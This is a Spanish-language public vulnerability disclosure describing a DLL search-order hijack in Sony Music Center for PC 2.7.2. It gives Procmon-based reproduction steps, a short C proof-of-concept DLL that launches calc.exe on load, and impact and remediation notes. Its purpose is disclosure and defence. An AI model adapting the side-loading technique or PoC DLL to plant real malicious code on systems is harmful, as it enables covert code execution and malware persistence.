Resumen
El fallo afectaba a Sony Music Center for PC, versión 2.7.2 (la última disponible cuando se reportó). Al arrancar, la aplicación intenta cargar una biblioteca llamada z-bes.dll que no se distribuye con el programa. Como no la encuentra junto al ejecutable, Windows continúa la búsqueda por los directorios de la variable de entorno PATH del sistema y la aplicación acaba cargando la primera que aparezca con ese nombre.
Se trata de una ruta de búsqueda no controlada (CWE-427), la técnica conocida como DLL side-loading o secuestro del orden de búsqueda de DLL (referencia MITRE ATT&CK: https://attack.mitre.org/techniques/T1574/001/). Si alguien con acceso al equipo puede escribir en cualquiera de las carpetas incluidas en el PATH, le basta con colocar ahí su propio z-bes.dll para que Music Center lo cargue y ejecute el código que contenga.
El investigador resurrect20 lo envió al programa de Sony el 23 de septiembre de 2025. Se clasificó con severidad alta, quedó marcado como resuelto y se divulgó públicamente el 5 de junio de 2026.
Pasos de reproducción
- Con Process Monitor (Procmon) en marcha, observar que la aplicación busca la biblioteca inexistente
z-bes.dllrecorriendo las rutas delPATHdel sistema (por ejemploC:\Program Files\Git\cmd\z-bes.dll,C:\Users\████████\Desktop\tools\z-bes.dll, etc.).
- Preparar una DLL que sirva de prueba de concepto. La del reporte simplemente lanza la calculadora de Windows (
calc.exe) al cargarse, para demostrar de forma inofensiva que el código se ejecuta:
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
system("calc.exe");
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
- Copiar esa DLL, con el nombre
z-bes.dll, en un directorio que esté registrado en elPATHdel sistema. En la prueba se usóC:\Users\████████\Desktop\tools\.
- Abrir de nuevo la aplicación y comprobar que aparece la calculadora.
- Revisar la salida de Procmon: se ve que la DLL colocada se ha mapeado y ejecutado.
Impacto
Una explotación con éxito permite a un atacante con acceso local ejecutar código arbitrario en la máquina objetivo. También podría usarse para instalar de forma encubierta un troyano aprovechando la aplicación de Sony como cobertura, para que el componente malicioso pase más desapercibido frente al antivirus.
Remediación
El investigador apunta que la DLL parece haberse eliminado del producto, pero la aplicación seguía intentando cargarla. Si ya no la necesita, lo correcto es que deje de buscarla. Como medida general frente a este tipo de ataque, recomienda cargar las bibliotecas indicando su ruta completa en lugar de dejar que Windows las resuelva a través del PATH.